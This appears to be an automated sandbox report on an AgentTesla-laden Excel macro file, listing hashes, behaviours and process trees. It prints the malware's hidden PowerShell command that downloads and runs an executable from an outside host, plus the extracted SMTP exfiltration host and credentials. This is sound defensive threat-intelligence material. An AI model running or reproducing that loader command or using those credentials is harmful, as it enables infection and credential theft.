Analysis
-
max time kernel
118s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
15-03-2023 02:30
Behavioral task
behavioral1
Sample
pnlfui.xlsm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
pnlfui.xlsm
Resource
win10v2004-20230220-en
General
-
Target
pnlfui.xlsm
-
Size
430KB
-
MD5
4b222ff63ba4a27646751b5dadfd3ed7
-
SHA1
4786533018798fbbb3083910b2459a80b3e60258
-
SHA256
37eb0640c85ef74c91b533f1fc7cc1ac9584d648330e105fb37b4231f885576c
-
SHA512
acbfccde01fde8e1ea84d5b7bca67774275f19c5ad4f4b23da340fec651f92998cbbb12937aefd82f9c13d97bb4d3574bf49ad4918d4aebd3f3403266ea7f4a6
-
SSDEEP
12288:HfMXQu7SHOCZhSTIS2dGpeWpqivD1YxR25O8UA:HNwarmMSAGMID1R5OtA
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
sqsendy.shop - Port:
587 - Username:
[email protected] - Password:
I^l1gJFLlu#v - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 864 4560 powershell.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 35 864 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
tmpA5E9.exepid process 3004 tmpA5E9.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 49 api.ipify.org 48 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
tmpA5E9.exedescription pid process target process PID 3004 set thread context of 4352 3004 tmpA5E9.exe RegAsm.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4560 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exetmpA5E9.exepid process 864 powershell.exe 864 powershell.exe 3004 tmpA5E9.exe 3004 tmpA5E9.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetmpA5E9.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 3004 tmpA5E9.exe Token: SeDebugPrivilege 4352 RegAsm.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 4560 EXCEL.EXE 4560 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE 4560 EXCEL.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
EXCEL.EXEpowershell.exetmpA5E9.exedescription pid process target process PID 4560 wrote to memory of 864 4560 EXCEL.EXE powershell.exe PID 4560 wrote to memory of 864 4560 EXCEL.EXE powershell.exe PID 864 wrote to memory of 3004 864 powershell.exe tmpA5E9.exe PID 864 wrote to memory of 3004 864 powershell.exe tmpA5E9.exe PID 3004 wrote to memory of 448 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 448 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 448 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 4352 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 4352 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 4352 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 4352 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 4352 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 4352 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 4352 3004 tmpA5E9.exe RegAsm.exe PID 3004 wrote to memory of 4352 3004 tmpA5E9.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\pnlfui.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "http://lostheaven.com.cn/wp-includes/BL-1600072563308pdf.exe" -OutFile $TempFile; Start-Process $TempFile;2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmpA5E9.exe"C:\Users\Admin\AppData\Local\Temp\tmpA5E9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q2yjwfy2.the.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmpA5E9.exeFilesize
1.1MB
MD5439d761548b85536d63cd8e4a8d26d8f
SHA167c92467dc3394d628a4f43b6950d7b340a052b5
SHA2565b178b34f935328b391d2aaf55c074d8560f09f22035f11309c659c4df2a1292
SHA5122a33a49dd93dd9a7822e2677e076f82f3e2fa33532012fe95605baba9ad2681e146ebec9f225778d25012f3efadfbba9b86321d23ee8572940cd3aff9304b8a3
-
C:\Users\Admin\AppData\Local\Temp\tmpA5E9.exeFilesize
1.1MB
MD5439d761548b85536d63cd8e4a8d26d8f
SHA167c92467dc3394d628a4f43b6950d7b340a052b5
SHA2565b178b34f935328b391d2aaf55c074d8560f09f22035f11309c659c4df2a1292
SHA5122a33a49dd93dd9a7822e2677e076f82f3e2fa33532012fe95605baba9ad2681e146ebec9f225778d25012f3efadfbba9b86321d23ee8572940cd3aff9304b8a3
-
C:\Users\Admin\AppData\Local\Temp\tmpA5E9.exeFilesize
1.1MB
MD5439d761548b85536d63cd8e4a8d26d8f
SHA167c92467dc3394d628a4f43b6950d7b340a052b5
SHA2565b178b34f935328b391d2aaf55c074d8560f09f22035f11309c659c4df2a1292
SHA5122a33a49dd93dd9a7822e2677e076f82f3e2fa33532012fe95605baba9ad2681e146ebec9f225778d25012f3efadfbba9b86321d23ee8572940cd3aff9304b8a3
-
memory/864-149-0x00000219F8490000-0x00000219F84A0000-memory.dmpFilesize
64KB
-
memory/864-160-0x00000219F8490000-0x00000219F84A0000-memory.dmpFilesize
64KB
-
memory/864-155-0x00000219F8440000-0x00000219F8462000-memory.dmpFilesize
136KB
-
memory/864-148-0x00000219F8490000-0x00000219F84A0000-memory.dmpFilesize
64KB
-
memory/3004-179-0x00000000003D0000-0x00000000004EE000-memory.dmpFilesize
1.1MB
-
memory/3004-180-0x000000001B110000-0x000000001B120000-memory.dmpFilesize
64KB
-
memory/4352-184-0x0000000005F50000-0x00000000064F4000-memory.dmpFilesize
5.6MB
-
memory/4352-197-0x0000000005B30000-0x0000000005B40000-memory.dmpFilesize
64KB
-
memory/4352-193-0x00000000075B0000-0x0000000007772000-memory.dmpFilesize
1.8MB
-
memory/4352-192-0x0000000007290000-0x00000000072E0000-memory.dmpFilesize
320KB
-
memory/4352-191-0x0000000007110000-0x000000000711A000-memory.dmpFilesize
40KB
-
memory/4352-190-0x0000000007150000-0x00000000071E2000-memory.dmpFilesize
584KB
-
memory/4352-189-0x0000000005B30000-0x0000000005B40000-memory.dmpFilesize
64KB
-
memory/4352-188-0x00000000059A0000-0x0000000005A06000-memory.dmpFilesize
408KB
-
memory/4352-181-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/4560-135-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-138-0x00007FFF16B00000-0x00007FFF16B10000-memory.dmpFilesize
64KB
-
memory/4560-139-0x00007FFF16B00000-0x00007FFF16B10000-memory.dmpFilesize
64KB
-
memory/4560-134-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-136-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-165-0x00000237ECEE0000-0x00000237ED089000-memory.dmpFilesize
1.7MB
-
memory/4560-137-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-133-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-209-0x00000237ECEE0000-0x00000237ED089000-memory.dmpFilesize
1.7MB
-
memory/4560-213-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-214-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-215-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-216-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmpFilesize
64KB
-
memory/4560-217-0x00000237ECEE0000-0x00000237ED089000-memory.dmpFilesize
1.7MB